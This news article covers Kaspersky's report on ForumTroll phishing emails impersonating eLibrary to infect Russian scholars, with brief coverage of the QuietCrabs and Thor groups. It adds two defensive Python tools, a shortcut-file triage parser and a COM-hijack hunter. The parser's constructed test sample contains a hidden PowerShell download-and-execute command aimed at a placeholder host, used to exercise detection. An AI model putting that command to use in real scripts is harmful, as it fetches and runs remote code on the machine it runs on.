New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails - The Hacker News
Ravie Lakshmanan | Dec 17, 2025 | Vulnerability / Malware
Kaspersky has attributed a fresh set of phishing attacks targeting individuals within Russia to the threat actor behind Operation ForumTroll.
The Russian cybersecurity vendor said it detected the new activity in October 2025. The origins of the threat actor are presently unknown.
"While the spring cyberattacks focused on organizations, the fall campaign honed in on specific individuals: scholars in the field of political science, international relations, and global economics, working at major Russian universities and research institutions," security researcher Georgy Kucherin said.
Operation ForumTroll refers to a series of sophisticated phishing attacks that exploited a then-zero-day vulnerability in Google Chrome (CVE-2025-2783, a sandbox escape affecting Chrome on Windows that Google patched in March 2025) to deliver the LeetAgent backdoor and a spyware implant known as Dante.
The latest wave likewise starts with emails purporting to come from eLibrary, a Russian scientific electronic library, sent from the address "support@e-library[.]wiki." The domain was registered in March 2025, six months before the campaign began, suggesting that preparations for the attack had been under way for some time.
Kaspersky said the domain was deliberately aged so that the messages would not trip the reputation checks that mail filters typically apply to freshly registered sender domains. The attackers also hosted a copy of the legitimate eLibrary homepage ("elibrary[.]ru") on the bogus domain to maintain the ruse.
The emails instruct prospective targets to click on an embedded link pointing to the malicious site to download a plagiarism report. Should a victim follow through, a ZIP archive with the naming pattern "<LastName>_<FirstName>_<Patronymic>.zip" is downloaded to their machine.
What's more, the links are single-use, a common anti-analysis measure: any subsequent visit to the URL displays a Russian-language message stating "Download failed, please try again later." If the download is attempted from a platform other than Windows, the user is prompted to "try again later on a Windows computer."
"The attackers also carefully personalized the phishing emails for their targets, specific professionals in the field," the company said. "The downloaded archive was named with the victim's last name, first name, and patronymic."
The archive contains a Windows shortcut (LNK) with the same name, which, when executed, runs a PowerShell script to download and launch a PowerShell-based payload from a remote server. The payload then contacts a URL to fetch a final-stage DLL and persist it using COM hijacking. It also downloads and displays a decoy PDF to the victim.
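The shortcut is the first stage a defender can actually get hold of, since the one-time download link is gone by the time the sample reaches an analyst. The following is an added example, not Kaspersky's code or anything recovered from the campaign: a small parser for the MS-SHLLINK header and StringData block that pulls the target path and command-line arguments out of a .lnk file and flags the PowerShell download-cradle pattern the article describes. The sample shortcut, its switches and the example.invalid URL are constructed for this illustration; the real arguments used by ForumTroll are not given on the page.

```python
"""Offline triage of a Windows shortcut (.lnk) for a PowerShell download cradle.

Parses the ShellLinkHeader and StringData sections defined in MS-SHLLINK and
flags shortcuts whose target or arguments launch PowerShell with download/IEX cues.
"""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80

# StringData sections occur in this fixed order, each present only if its flag is set.
STRING_FIELDS = [
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]

# Substrings that, together, characterise a LNK-launched PowerShell stager.
INDICATORS = [
    ("powershell", "launches PowerShell"),
    ("-w hidden", "hidden window"),
    ("-nop", "skips profile"),
    ("-enc", "encoded command"),
    ("downloadstring", "download cradle"),
    ("invoke-webrequest", "download cradle"),
    ("iex", "in-memory execution (Invoke-Expression)"),
    ("http", "remote URL embedded in shortcut"),
]


def parse_lnk(data: bytes) -> dict:
    """Return the LinkFlags and every StringData field present in a .lnk blob."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76  # end of the fixed-size ShellLinkHeader
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]  # IDListSize + IDList bytes
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]  # LinkInfoSize counts itself
    fields = {"flags": flags}
    unicode = bool(flags & IS_UNICODE)
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        size = count * 2 if unicode else count
        raw = data[pos:pos + size]
        pos += size
        # Non-Unicode strings use the system ANSI code page; cp1252 is assumed here.
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252", errors="replace")
    return fields


def triage(fields: dict) -> list:
    """Return the distinct reasons a parsed shortcut looks like a stager (empty if none)."""
    keys = ("relative_path", "working_dir", "arguments", "icon_location")
    text = " ".join(fields.get(k, "") for k in keys).lower()
    reasons = []
    for needle, reason in INDICATORS:
        if needle in text and reason not in reasons:
            reasons.append(reason)
    return reasons


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode .lnk carrying only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS.
    Constructed test data for this example, not a real sample."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (76 - len(header))  # attributes, times, size, icon, show, hotkey, reserved

    def string_data(value: str) -> bytes:
        return struct.pack("<H", len(value)) + value.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


# Constructed sample modelled on the chain in the article; the URL and switches are assumptions.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-NoP -W Hidden -C \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\"",
)
BENIGN_LNK = build_lnk(r"..\..\..\Windows\System32\notepad.exe", "")

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        parsed = parse_lnk(blob)
        print(label, parsed.get("arguments"), triage(parsed))
```

On a real file, read it with `open(path, "rb").read()` and pass the bytes to `parse_lnk`; the parser stops after StringData, so the ExtraData block (which can hold the originating machine's NetBIOS name and MAC in the TrackerDataBlock) is left for a fuller tool. A shortcut whose relative path points at powershell.exe while the displayed icon suggests a PDF is itself worth flagging, which is why the icon location is included in the text that is scored.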
The final payload is a command-and-control (C2) and red teaming framework known as Tuoni, enabling the threat actors to gain remote access to the victim's Windows device.
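The COM hijacking persistence described above leaves a durable trace: a per-user CLSID registration under HKCU\Software\Classes\CLSID whose InprocServer32 points at the planted DLL. Because the per-user key is resolved before the machine-wide one under HKLM, any process in that user's session that instantiates the class loads the attacker's DLL. The following is an added example, not Kaspersky's code and not tied to any CLSID the article names: it reads a `reg export` of both hives as text and reports HKCU entries that shadow an HKLM server or point into a user-writable directory. The CLSIDs, paths and user name in the embedded export are constructed placeholders.

```python
r"""Hunt for per-user COM hijacks in an exported registry hive (offline, text-based).

A CLSID registered under HKCU\Software\Classes\CLSID is resolved before the
machine-wide entry under HKLM\SOFTWARE\Classes\CLSID, so a user-writable DLL
planted there is loaded by any process that instantiates that class in the session.
"""
import re

# Matches an InprocServer32 key under either hive; group 1 = hive, group 2 = CLSID.
CLSID_KEY = re.compile(
    r"^(hkey_current_user|hkey_local_machine)\\software\\classes\\clsid\\"
    r"(\{[0-9a-f-]{36}\})\\inprocserver32$"
)
# Directories a standard user can write to; a COM server DLL living here is a red flag.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\")


def parse_reg_export(text: str) -> dict:
    """Map each [key] in .reg syntax (lower-cased) to its default value, unescaping backslashes."""
    defaults, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
        elif current and line.startswith('@="') and line.endswith('"'):
            defaults[current] = line[3:-1].replace("\\\\", "\\")
    return defaults


def find_com_hijacks(defaults: dict) -> list:
    """Return (clsid, dll, reasons) for HKCU InprocServer32 entries that shadow an HKLM
    server or point at a DLL in a user-writable directory."""
    hkcu, hklm = {}, {}
    for key, dll in defaults.items():
        m = CLSID_KEY.match(key)
        if m:
            (hkcu if m.group(1) == "hkey_current_user" else hklm)[m.group(2)] = dll
    findings = []
    for clsid, dll in hkcu.items():
        reasons = []
        if clsid in hklm:
            reasons.append("per-user entry shadows HKLM server " + hklm[clsid])
        if any(p in dll.lower() for p in USER_WRITABLE):
            reasons.append("server DLL lives in a user-writable directory")
        if reasons:
            findings.append((clsid, dll, reasons))
    return findings


# Constructed export: the CLSIDs, paths and user name are placeholders, not real indicators.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Windows\\System32\\legit.dll"
"ThreadingModel"="Both"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Users\\victim\\AppData\\Roaming\\Updater\\stage.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}\InprocServer32]
@="C:\\Program Files\\Vendor\\vendor.dll"
"""

if __name__ == "__main__":
    for clsid, dll, reasons in find_com_hijacks(parse_reg_export(SAMPLE_EXPORT)):
        print(clsid, dll, "; ".join(reasons))
```

To run it against a real host, export both trees with `reg export "HKCU\Software\Classes\CLSID" hkcu.reg` and `reg export "HKLM\SOFTWARE\Classes\CLSID" hklm.reg`, concatenate the files (they are UTF-16 with a BOM, so decode with `utf-16`) and feed the text to `parse_reg_export`. Per-user entries for legitimately installed per-user software (the third key in the sample) do not shadow an HKLM class and sit under Program Files, so they are not reported; an entry that both shadows a machine-wide server and loads from AppData is the pattern to escalate.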
"ForumTroll has been targeting organizations and individuals in Russia and Belarus since at least 2022," Kaspersky said. "Given this lengthy timeline, it is likely this APT group will continue to target entities and individuals of interest within these two countries."
The disclosure comes as Positive Technologies detailed the activities of two threat clusters: QuietCrabs, a suspected Chinese hacking group also tracked as UTA0178 and UNC5221, and Thor, which appears to have been involved in ransomware attacks since May 2025.
These intrusion sets have been found to leverage security flaws in Microsoft SharePoint (CVE-2025-53770), Ivanti Endpoint Manager Mobile (CVE-2025-4427 and CVE-2025-4428), Ivanti Connect Secure (CVE-2024-21887), and Ivanti Sentry (CVE-2023-38035).
Attacks carried out by QuietCrabs take advantage of the initial access to deploy an ASPX web shell and use it to deliver a JSP loader that's capable of downloading and executing KrustyLoader, which then drops the Sliver implant.
"Thor is a threat group first observed in attacks against Russian companies in 2025," researchers Alexander Badayev, Klimentiy Galkin, and Vladislav Lunin said. "As final payloads, the attackers use LockBit and Babuk ransomware, as well as Tactical RMM and MeshAgent to maintain persistence."
Tags: Advanced Persistent Threat, Command and Control, cybersecurity, Kaspersky, Malware, Microsoft SharePoint, Phishing, PowerShell, ransomware, Vulnerability, zero-day